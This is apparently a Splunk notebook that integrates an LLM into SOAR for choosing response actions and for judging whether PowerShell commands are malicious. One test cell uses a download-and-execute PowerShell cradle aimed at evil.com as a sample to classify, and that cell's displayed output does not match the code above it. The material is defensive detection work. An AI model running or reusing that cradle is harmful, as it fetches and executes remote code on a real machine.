# LLM Decision Making Script for DSDL-SOAR Integration

This notebook serves as the script of **LLM decision making** custom function on Splunk SOAR. It provides an example how DSDL can be integrated with SOAR.

## Stage 0 - import libraries
At stage 0 we define all imports necessary to run our subsequent code depending on various libraries.

In [2]:
# this definition exposes all python module imports that should be available in all subsequent commands
import json
import numpy as np
import pandas as pd
import requests

from llama_index.llms.azure_openai import AzureOpenAI
from llama_index.core.prompts import ChatPromptTemplate
from llama_index.core.llms import ChatMessage
from llama_index.core.llms.structured_llm import StructuredLLM
from app.model.llm_utils import create_llm, create_embedding_model
from typing import List
from pydantic import BaseModel, Field
from llama_index.core.program import LLMTextCompletionProgram
from llama_index.core.prompts import PromptTemplate
from llama_index.core.output_parsers import PydanticOutputParser
from llama_index.core.tools import ToolMetadata
from llama_index.core.selectors import LLMSingleSelector
from app.model.llm_utils import create_llm, create_embedding_model, create_vector_db
# ...
# global constants
MODEL_DIRECTORY = "/srv/app/model/data/"

## Exampe 1: Use LLM as a tool selector

In [15]:
# choices as a list of tool metadata
choices = [
    ToolMetadata(description="quarantine the server", name="quarantine_tool"),
    ToolMetadata(description="update route table", name="route_table_tool"),
]

llm, m = create_llm(service="azure_openai")
print(m)

Initializing LLM object from azure_openai
Successfully created LLM object from azure_openai


In [17]:
selector = LLMSingleSelector.from_defaults(llm=llm)
selector_result = selector.select(
    choices, query="We have identified a compromised server."
)
print("Decision: " + choices[selector_result.selections[0].index].name)
print("Reason: " + selector_result.selections[0].reason)

Decision: quarantine_tool
Reason: The most relevant choice is to quarantine the server because it has been identified as compromised. Quarantining the server will help prevent further damage and contain the potential threat.


In [18]:
selector = LLMSingleSelector.from_defaults(llm=llm)
selector_result = selector.select(
    choices, query="We have identified that some routing info are missing"
)
print("Decision: " + choices[selector_result.selections[0].index].name)
print("Reason: " + selector_result.selections[0].reason)

Decision: route_table_tool
Reason: Updating the route table can help resolve missing routing information.


## Example 2: Use LLM as a classifier

In [None]:
query = '''Is the following powershell command malicious?  
get compute info'''
bool_choices = [
    ToolMetadata(description="The powershell command is malicious", name="True"),
    ToolMetadata(description="The powershell command is benign", name="False"),
]

llm, m = create_llm(service="azure_openai")
print(m)

bool_selector = LLMSingleSelector.from_defaults(llm=llm)
bool_selector_result = bool_selector.select(
    bool_choices, query=query
)
print("Decision: " + bool_choices[bool_selector_result.selections[0].index].name)
print("Reason: " + bool_selector_result.selections[0].reason)

## Stage 1 - get a data sample from Splunk
In Splunk run a search to pipe a dataset into your notebook environment. Note: mode=stage is used in the | fit command to do this.

In [4]:
# this cell is not executed from MLTK and should only be used for staging data into the notebook environment
def stage(name):
    with open("data/"+name+".csv", 'r') as f:
        df = pd.read_csv(f)
    with open("data/"+name+".json", 'r') as f:
        param = json.load(f)
    return df, param

In [None]:
# THIS CELL IS NOT EXPORTED - free notebook cell for testing or development purposes
df, param = stage("soar_llm_prompt_formatted")
print(df.describe())
print(param)

## Stage 2 - create and initialize a model

In [None]:
# initialize your model
# available inputs: data and parameters
# returns the model object which will be used as a reference to call fit, apply and summary subsequently
def init(df,param):
    model = {}
    model['hyperparameter'] = 42.0
    return model

In [None]:
# THIS CELL IS NOT EXPORTED - free notebook cell for testing or development purposes
print(init(df,param))

## Stage 3 - fit the model

In [None]:
# train your model
# returns a fit info json object and may modify the model object
def fit(model,df,param):
    # model.fit()
    info = {"message": "model trained"}
    return info

In [None]:
# THIS CELL IS NOT EXPORTED - free notebook cell for testing or development purposes
print(fit(model,df,param))

## Stage 4 - apply the model

In [3]:
def apply(model,df,param):
    try:
        llm_service = param['options']['params']['llm_service'].strip("\"")
        print(f"Using {llm_service} LLM service.")
    except:
        llm_service = "ollama"
        print("Using default Ollama LLM service.")

    if llm_service == "ollama": 
        try:
            model_name = param['options']['params']['model_name'].strip("\"")
        except:
            returns=pd.DataFrame({"decision": [None], "reason": ["ERROR: Please specify model_name input for using Ollama LLMs"]})
            return returns 
        llm, m = create_llm(service='ollama', model=model_name)
    else:
        llm, m = create_llm(service=llm_service)
    
    try:
        prompt = param['options']['params']['prompt'].strip("\"")
        context = param['options']['params']['context'].strip("\"")
    except:
        returns=pd.DataFrame({"decision": [None], "reason": ["ERROR: Please specify prompt and context inputs"]})
        return returns 

    query = f'''{prompt}
    ----------------------
    {context}
    '''
    
    try:
        labels = json.loads(param['options']['params']['labels'])
        descriptions = json.loads(param['options']['params']['descriptions'])
        assert len(labels) == len(descriptions)
    except Exception as e:
        returns=pd.DataFrame({"decision": [None], "reason": [f"ERROR loading labels and descriptions: {e}"]})
        return returns

    choices = []

    for i in range(len(labels)):
        choices.append(ToolMetadata(description=descriptions[i], name=labels[i]))

    selector = LLMSingleSelector.from_defaults(llm=llm)
    try:
        selector_result = selector.select(
            choices, query=query
        )
        decision = choices[selector_result.selections[0].index].name
        reason = selector_result.selections[0].reason
        returns=pd.DataFrame({"decision": [decision], "reason": [reason]})
        return returns
    except Exception as e:
        returns=pd.DataFrame({"decision": [None], "reason": [f"ERROR receiving response from LLM: {e}"]})
        return returns

In [4]:
param = {'options':{'params':{'prompt': "Is the following powershell command malicious?", "query":"IEX (New-Object Net.WebClient).DownloadString(htttp://evil.com/malware.ps1)"}}}

a = apply(None, None, param)
a

Initializing LLM object from ollama


Unnamed: 0,is_positive,reason
0,True,The PowerShell command uses `Invoke-Expression...


In [None]:
# THIS CELL IS NOT EXPORTED - free notebook cell for testing or development purposes
print(apply(model,df,param))

## Stage 5 - save the model

In [None]:
# save model to name in expected convention "<algo_name>_<model_name>"
def save(model,name):
    with open(MODEL_DIRECTORY + name + ".json", 'w') as file:
        json.dump(model, file)
    return model

## Stage 6 - load the model

In [None]:
# load model from name in expected convention "<algo_name>_<model_name>"
def load(name):
    model = {}
    with open(MODEL_DIRECTORY + name + ".json", 'r') as file:
        model = json.load(file)
    return model

## Stage 7 - provide a summary of the model

In [21]:
# return a model summary
def summary(model=None):
    returns = {"version": {"numpy": np.__version__, "pandas": pd.__version__} }
    return returns